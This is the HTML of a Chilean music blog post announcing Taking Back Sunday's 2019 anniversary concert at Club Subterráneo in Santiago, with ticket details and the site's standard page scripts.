                <img width="300" height="200" src="http://www.disorder.cl/blog/wp-content/uploads/2018/09/sauvage-front1-300x200.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" />                <h1>
                    <a href="http://www.disorder.cl/2018/09/03/sauvage-persiguiendo-el-amor/" title="Sauvage: Persiguiendo el amor">
                        Sauvage: Persiguiendo el amor                    </a>
                    <br/>
                </h1>
                <small>3 de septiembre de 2018</small>
            </div>
                    <div class="post-side">
                <img width="300" height="200" src="http://www.disorder.cl/blog/wp-content/uploads/2018/08/aya-front1-300x200.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" />                <h1>
                    <a href="http://www.disorder.cl/2018/08/26/aprende-sobre-ayahuasca-centro-arte-alameda/" title="Aprende sobre consumo y uso de Ayahuasca este jueves en Centro Arte Alameda">
                        Aprende sobre consumo y uso de Ayahuasca este jueves en Centro Arte Alameda                    </a>
                    <br/>
                </h1>
                <small>26 de agosto de 2018</small>
            </div>
                    <div class="post-side">
                <img width="300" height="200" src="http://www.disorder.cl/blog/wp-content/uploads/2018/08/perkin-front-300x200.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" />                <h1>
                    <a href="http://www.disorder.cl/2018/08/25/perkin-la-pelicula-nos-muestra-el-secreto-mundo-de-los-estafetas/" title="Perkin, la película que nos muestra el secreto mundo de los estafetas en Santiago">
                        Perkin, la película que nos muestra el secreto mundo de los estafetas en Santiago                    </a>
                    <br/>
                </h1>
                <small>25 de agosto de 2018</small>
            </div>
        


    
</div>

        <div class="col-left-single">

        	<div id="post-item-69987" class="post">

    			<div class="content">
                    <img class="aligncenter size-full wp-image-69988" src="http://www.disorder.cl/blog/wp-content/uploads/2018/10/tbs1.jpg" alt="" width="600" height="600" srcset="http://www.disorder.cl/blog/wp-content/uploads/2018/10/tbs1.jpg 600w, http://www.disorder.cl/blog/wp-content/uploads/2018/10/tbs1-160x160.jpg 160w, http://www.disorder.cl/blog/wp-content/uploads/2018/10/tbs1-190x190.jpg 190w" sizes="(max-width: 600px) 100vw, 600px" />
<p>Ha estado todo raro, el clima, la gente, la ciudad completa. Mal augurio. Pero sale la luz, se asoma el arcoiris y al final del camino se vislumbra algo increíble: <a href="http://www.takingbacksunday.com/">Taking Back Sunday</a> vuelve!!!</p>
<p><strong>Pero no solo vienen de regreso a nuestro país para entregarnos todo ese precioso emoxcore tan dosmilero</strong>, sino que la gira que los trae de vuelta está enmarcada en la celebración de los <strong>20 años de la banda</strong> y con especial énfasis en el <em><strong>Tell All Your Friends</strong></em>, el cual interpretarán íntegramente.</p>
<p>El primer disco de estudio de <strong>TBS</strong>, que sacaron a través de <a href="https://www.victoryrecords.com/">Victory Records</a>, fue también el disco más vendido de la banda, con más de 790 mil copias y que los encumbró como una de los grupos ícono del movimiento emo junto a <strong>My Chemical Romance y The Used</strong>.</p>
<p>Así que el próximo año, el <strong>15 de marzo</strong> para ser específicos, podrás apretarte bien la nariz y sumergirte en temas como <em><strong>You&#8217;re so last summer</strong></em>, <em><strong>Cute without the &#8220;E&#8221;</strong></em> o <strong>There is no &#8220;I&#8221; in the team</strong> porque TBS vuelve tras 7 años y los podrás ver en <a href="https://es-la.facebook.com/ClubSubterraneo/">Club Subterraneo</a>.</p>
<p><a href="https://www.facebook.com/events/1956161954422770/"><strong>Taking Back Sunday en Chile</strong></a><br />
<strong>Viernes 15 de marzo – Club Subterráneo</strong><br />
<strong>Entradas disponibles en <a href="https://www.passline.com/eventos/taking-back-sunday-en-chile--20th-anniversary-tour?fbclid=IwAR2vQYaf0kz49hf8VQ4RFkAbCOs9r9KTkB80QheNTKN-TYDaqEsmsrwUlMU">Passline</a><br />
</strong><strong>Desde el jueves 11 de octubre en tienda Nothing (Portal Lyon).</strong><br />
<strong>Preventa 1: <del>$20.000</del> Agotada / Preventa 2: $25.000</strong></p>
<p><iframe width="500" height="375" src="https://www.youtube.com/embed/ap0mqwvf7H0?feature=oembed" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe></p>
                </div>

                
                <div class="tags">
                    <div class="tagwrap">
                        <a href='http://www.disorder.cl/tag/adam-lazzara/' title='Adam Lazzara' >#Adam Lazzara</a><a href='http://www.disorder.cl/tag/club-suterraneo/' title='club suterraneo' >#club suterraneo</a><a href='http://www.disorder.cl/tag/conciertos-chile-2019/' title='Conciertos Chile 2019' >#Conciertos Chile 2019</a><a href='http://www.disorder.cl/tag/portada/' title='portada' >#portada</a><a href='http://www.disorder.cl/tag/taking-back-sunday/' title='taking back sunday' >#taking back sunday</a><a href='http://www.disorder.cl/tag/tbs/' title='TBS' >#TBS</a><a href='http://www.disorder.cl/tag/tell-all-your-friends/' title='Tell All Your Friends' >#Tell All Your Friends</a><a href='http://www.disorder.cl/tag/youre-so-last-summer/' title='You're so last summer' >#You're so last summer</a>                    </div>

                    <div class="tagshare">
                        <div id="fb-root" style="float:left; margin:0px 0px 20px 0px;"></div><script src="http://connect.facebook.net/es_ES/all.js#xfbml=1"></script><fb:like href="http://www.disorder.cl/2018/10/11/vuelve-taking-back-sunday-chile-y-no-damos-mas-de-felicidad/" send="false" layout="button_count" width="115" height="25" show_faces="true" action="like" font=""></fb:like>
                        <a style="margin:20px 0px 0px 0px;" href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="disordernews" data-lang="es">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
                    </div>
                </div>

        	</div>

         

        <div class="related"><h1>LEE TAMBIÉN:</h1>                <div class="related-item">
                    <a href="http://www.disorder.cl/2018/10/09/cartel-festival-sideral/" title="Ya está el cartel completo del IV Festival Sideral">
                                            <img src="http://www.disorder.cl/blog/wp-content/uploads/2018/10/NIÑOS-DEL-CERRO-LIMA-300x200.jpg" title="Ya está el cartel completo del IV Festival Sideral">
                                        </a>
                    
                    <h1><a href="http://www.disorder.cl/2018/10/09/cartel-festival-sideral/" title="Ya está el cartel completo del IV Festival Sideral">Ya está el cartel completo del IV Festival Sideral</a></h1>
                </div>
                        <div class="related-item">
                    <a href="http://www.disorder.cl/2018/10/09/barrio-mio-evento-rbmfstgo-barrio-yungay/" title="Todo lo que hay que saber de Barrio Mío, el evento del RBMFSTGO en Barrio Yungay">
                                            <img src="http://www.disorder.cl/blog/wp-content/uploads/2018/10/barrio-front-300x200.jpg" title="Todo lo que hay que saber de Barrio Mío, el evento del RBMFSTGO en Barrio Yungay">
                                        </a>
                    
                    <h1><a href="http://www.disorder.cl/2018/10/09/barrio-mio-evento-rbmfstgo-barrio-yungay/" title="Todo lo que hay que saber de Barrio Mío, el evento del RBMFSTGO en Barrio Yungay">Todo lo que hay que saber de Barrio Mío, el evento del RBMFSTGO en Barrio Yungay</a></h1>
                </div>
                        <div class="related-item">
                    <a href="http://www.disorder.cl/2018/10/08/festival-neutral-imagenes/" title="Pura intensidad: Revisa las mejores imágenes de Festival Neutral 2018">
                                            <img src="http://www.disorder.cl/blog/wp-content/uploads/2018/10/beutral-11-300x200.jpg" title="Pura intensidad: Revisa las mejores imágenes de Festival Neutral 2018">
                                        </a>
                    
                    <h1><a href="http://www.disorder.cl/2018/10/08/festival-neutral-imagenes/" title="Pura intensidad: Revisa las mejores imágenes de Festival Neutral 2018">Pura intensidad: Revisa las mejores imágenes de Festival Neutral 2018</a></h1>
                </div>
                        <div class="related-item">
                    <a href="http://www.disorder.cl/2018/10/06/jamez-manuel-venom-nuevo-tema/" title="Jamez Manuel se convierte en Venom en nuevo tema">
                                            <img src="http://www.disorder.cl/blog/wp-content/uploads/2018/10/jamez1-300x200.jpg" title="Jamez Manuel se convierte en Venom en nuevo tema">
                                        </a>
                    
                    <h1><a href="http://www.disorder.cl/2018/10/06/jamez-manuel-venom-nuevo-tema/" title="Jamez Manuel se convierte en Venom en nuevo tema">Jamez Manuel se convierte en Venom en nuevo tema</a></h1>
                </div>
        </div>
                    
            <h1 class="comment-title" id="comments"> Comentarios publicados en "Vuelve Taking Back Sunday a Chile y no damos más de felicidad"</h1>
            <a href="#comentar" class="comenta">¡Deja el tuyo!</a>

            <div class="fb-comments" data-href="http://www.disorder.cl/2018/10/11/vuelve-taking-back-sunday-chile-y-no-damos-mas-de-felicidad/" data-width="630" data-num-posts="5"></div>
            
<!-- You can start editing here. -->


		
		<!-- No comments yet -->
		
	


<div class="box-left-newcomment">
	<a name="comentar"></a>
	

	
	<fieldset id="commentfieldset">

		<div id="respond" class="respuesta">

			<div id="commentform">

			<form action="http://www.disorder.cl/blog/wp-comments-post.php" method="post">

				
				<table width="100%" border="0" cellspacing="0" cellpadding="0" class="tableform">
				  <tr>
				    <td><label for="author">Nombre: (*)</label></td>
				    <td><label for="email">E-mail: (*)</label></td>
				    <td><label for="url">Web o Red social:</label></td>
				  </tr>
				  <tr>
				    <td><input type="text" name="author" id="name" class="text" value="" size="22" tabindex="1" /></td>
				    <td><input type="text" name="email" id="email" class="text" value="" size="22" tabindex="2" /></td>
				    <td><input type="text" name="url" id="website" class="text" value="" size="22" tabindex="3" /></td>
				  </tr>
				</table>


				
				<label for="message">Comentario:</label>
				<textarea name="comment" id="message" tabindex="4"></textarea>

				<input name="submit" type="submit" class="button" tabindex="5" value="Enviar" class="sbmt" />
				<div id="cancel-comment-reply">
					<a rel="nofollow" id="cancel-comment-reply-link" href="/2018/10/11/vuelve-taking-back-sunday-chile-y-no-damos-mas-de-felicidad/#respond" style="display:none;">CANCELAR</a>				</div>

				<input type='hidden' name='comment_post_ID' value='69987' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />

				<p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="6756bec8e5" /></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="146"/></p>
			</form>

			</div><!-- end commentform -->

		</div><!-- end respond -->

	</fieldset>

</div><!-- end box-left -->


        

        </div>

    </div>

  
<div class="footer">

        <div class="navi">
        
                    <div class="next-prev">
                                                        <div class="prev-post" style="background-image:url(http://www.disorder.cl/blog/wp-content/uploads/2018/10/afiche.jpeg);" onclick="location.href='http://www.disorder.cl/2018/10/09/cartel-festival-sideral/'">
                        <div class="postmask"></div>
                        <!--div class="box-title">anterior</div-->
                        <a href="http://www.disorder.cl/2018/10/09/cartel-festival-sideral/">
                            Ya está el cartel completo del IV Festival Sideral                        </a>
                    </div>

                
                
                
                <script>
                    $(document).ready(function(){
                        $(".prev-post, .next-post").mouseenter(function(){
                            $(this).find(".postmask").fadeOut().one();
                        });
                        $(".prev-post, .next-post").mouseleave(function(){
                            $(this).find(".postmask").fadeIn().one();
                        });
                    });
                </script>

            </div>

        
        <div class="pagination">
            <span class="prev_page"></span>
            <span class="next_page"></span>
        </div>

    </div>

    
    <div class="colorline"></div>

        <div class="footer-hits">

                            <h1>HITS</h1>
                                                
                    <div class="hit">
                        <a href="http://www.disorder.cl/2013/11/13/esa-insoportable-y-aburrida-moda-de-acreditarse-a-conciertos-y-salir-pelando/" title="Esa insoportable y aburrida moda de acreditarse a conciertos y salir pelando">
                                                            <img width="300" height="200" src="http://www.disorder.cl/blog/wp-content/uploads/2013/11/lana-200-300x200.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" />                                                    </a>
                        <h1><a href="http://www.disorder.cl/2013/11/13/esa-insoportable-y-aburrida-moda-de-acreditarse-a-conciertos-y-salir-pelando/" title="Esa insoportable y aburrida moda de acreditarse a conciertos y salir pelando">Esa insoportable y aburrida moda de acreditarse a conciertos y salir pelando</a></h1>
                    </div>

                
                    <div class="hit">
                        <a href="http://www.disorder.cl/2012/04/26/necro-escultor-death-metal-que-cambio-el-infierno-por-un-bosque-encantado/" title="El escultor death metal que cambió el infierno por un bosque encantado">
                                                            <img width="300" height="200" src="http://www.disorder.cl/blog/wp-content/uploads/2012/04/Michael-Benitez.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" srcset="http://www.disorder.cl/blog/wp-content/uploads/2012/04/Michael-Benitez.jpg 300w, http://www.disorder.cl/blog/wp-content/uploads/2012/04/Michael-Benitez-285x190.jpg 285w" sizes="(max-width: 300px) 100vw, 300px" />                                                    </a>
                        <h1><a href="http://www.disorder.cl/2012/04/26/necro-escultor-death-metal-que-cambio-el-infierno-por-un-bosque-encantado/" title="El escultor death metal que cambió el infierno por un bosque encantado">El escultor death metal que cambió el infierno por un bosque encantado</a></h1>
                    </div>

                
                    <div class="hit">
                        <a href="http://www.disorder.cl/2009/02/16/soy-una-autopista-tengo-sentimientos/" title="Soy una autopista, tengo sentimientos">
                                                                                                      
        
                            <a href="http://www.disorder.cl/2009/02/16/soy-una-autopista-tengo-sentimientos/" title="Soy una autopista, tengo sentimientos" alt="Soy una autopista, tengo sentimientos">
                        <img src="http://www.disorder.cl/blog/wp-content/uploads/2009/02/yoautopista-2.jpg" class="archive-thumb" />
                    </a>
                            
			
	                                                    </a>
                        <h1><a href="http://www.disorder.cl/2009/02/16/soy-una-autopista-tengo-sentimientos/" title="Soy una autopista, tengo sentimientos">Soy una autopista, tengo sentimientos</a></h1>
                    </div>

                
                    <div class="hit">
                        <a href="http://www.disorder.cl/2012/05/17/entrevista-sebastian-hacher-y-su-cronica-desde-el-mercado-textil-pirata-mas-grande-del-mundo/" title="Sebastian Hacher y su crónica desde el mercado textil pirata más grande del mundo">
                                                            <img width="300" height="200" src="http://www.disorder.cl/blog/wp-content/uploads/2012/05/hecher-630.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" srcset="http://www.disorder.cl/blog/wp-content/uploads/2012/05/hecher-630.jpg 630w, http://www.disorder.cl/blog/wp-content/uploads/2012/05/hecher-630-285x190.jpg 285w" sizes="(max-width: 300px) 100vw, 300px" />                                                    </a>
                        <h1><a href="http://www.disorder.cl/2012/05/17/entrevista-sebastian-hacher-y-su-cronica-desde-el-mercado-textil-pirata-mas-grande-del-mundo/" title="Sebastian Hacher y su crónica desde el mercado textil pirata más grande del mundo">Sebastian Hacher y su crónica desde el mercado textil pirata más grande del mundo</a></h1>
                    </div>

                
                    <div class="hit">
                        <a href="http://www.disorder.cl/2008/09/24/miss-garrison-sexo-plastico-en-la-ciudad/" title="Miss Garrison: sexo (plástico) en la ciudad">
                                                            <img width="300" height="133" src="http://www.disorder.cl/blog/wp-content/uploads/2008/09/missgarrison-1.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" />                                                    </a>
                        <h1><a href="http://www.disorder.cl/2008/09/24/miss-garrison-sexo-plastico-en-la-ciudad/" title="Miss Garrison: sexo (plástico) en la ciudad">Miss Garrison: sexo (plástico) en la ciudad</a></h1>
                    </div>

                                            


        </div>


    <div class="footer-info">

                
            <h1>DISORDER MAGAZINE</h1>

            <div class="foot-menu">
                <a data-dropdown="#dropdown-1" href="http://www.disorder.cl" >PORTADA</a>
                <a href="http://www.disorder.cl/magazine"> MAGAZINE </a>
                                <a href="http://www.disorder.cl/musica"  class="active" > M&Uacute;SICA </a>
                <a href="http://www.disorder.cl/cine-y-tv" > CINE Y TV </a>
                <a href="http://www.disorder.cl/tecnologia-e-internet"> Tecnolog&iacute;a e Internet </a>
                <a href="http://www.disorder.cl/videos"  > VIDEOS </a>
                <a href="http://www.disorder.cl/contacto" > CONTACTO </a>
                <!--a href="https://plus.google.com/113898145274351491464" rel="publisher">Google+</a-->
            </div>

        
        <p>(2003 - 2018) Publicamos bajo una licencia Creative Commons a través de WordPress.</p>
        <p>Prohibida la reproducci&oacute;n total o parcial de contenidos.</p>
        <br />

        <a title="Volver arriba" href="javascript:scroll(0,0)" class="gotop">( ↑ Subir )</a>

    </div>
</div>


<script src ="http://www.disorder.cl/blog/wp-content/themes/Disorder-2014/js/jquery.fitvids.js"></script>

<script src="http://www.disorder.cl/blog/wp-content/themes/Disorder-2014/js/lean-slider.js"></script>

<script src="http://www.disorder.cl/blog/wp-content/themes/Disorder-2014/js/jquery-scrolltofixed-min.js"></script>


  
<script type="text/javascript" language="javascript" src="http://www.disorder.cl/blog/wp-content/themes/Disorder-2014/js/jquery.animate-colors-min.js"></script>



<script type="text/javascript" language="javascript" src="http://www.disorder.cl/blog/wp-content/themes/Disorder-2014/js/all.js"></script>

<script type='text/javascript' src='http://www.disorder.cl/blog/wp-content/plugins/akismet/_inc/form.js?ver=3.1.5'></script>
<script type='text/javascript' src='http://www.disorder.cl/blog/wp-includes/js/comment-reply.min.js?ver=4.9.8'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var pollsL10n = {"ajax_url":"http:\/\/www.disorder.cl\/blog\/wp-admin\/admin-ajax.php","text_wait":"Your last request is still being processed. Please wait a while ...","text_valid":"Please choose a valid poll answer.","text_multiple":"Maximum number of choices allowed: ","show_loading":"1","show_fading":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.disorder.cl/blog/wp-content/plugins/wp-polls/polls-js.js?ver=2.63'></script>
<script type='text/javascript' src='http://www.disorder.cl/blog/wp-includes/js/wp-embed.min.js?ver=4.9.8'></script>

<!-- Start Of Script Generated By cforms v14.6 [Oliver Seidel | www.deliciousdays.com] -->
<!-- End Of Script Generated By cforms -->

<script>
/*
$(document).ready(function(){
  $(document).mousemove(function(){

    var newColor = '#'+(0x1000000+(Math.random())*0xffffff).toString(16).substr(1,6);


var colors = ["#CCCCCC","#333333","#990099"];                
  var rand = Math.floor(Math.random()*colors.length);           
  $('#controls-wrapper').css("background-color", newColor);
  $('h1').css("color",newColor);

  /**/

/*
  $(function() {
    var cache = $('#hover').css('background-color','#6600FF');
    $('#hover').hover(function() {
        $(this).css({'background-color' : rgb() });
    },function() {
        $(this).css({'background-color' : cache });
    });
});

  });
  
});*/
</script>
</body>
</html>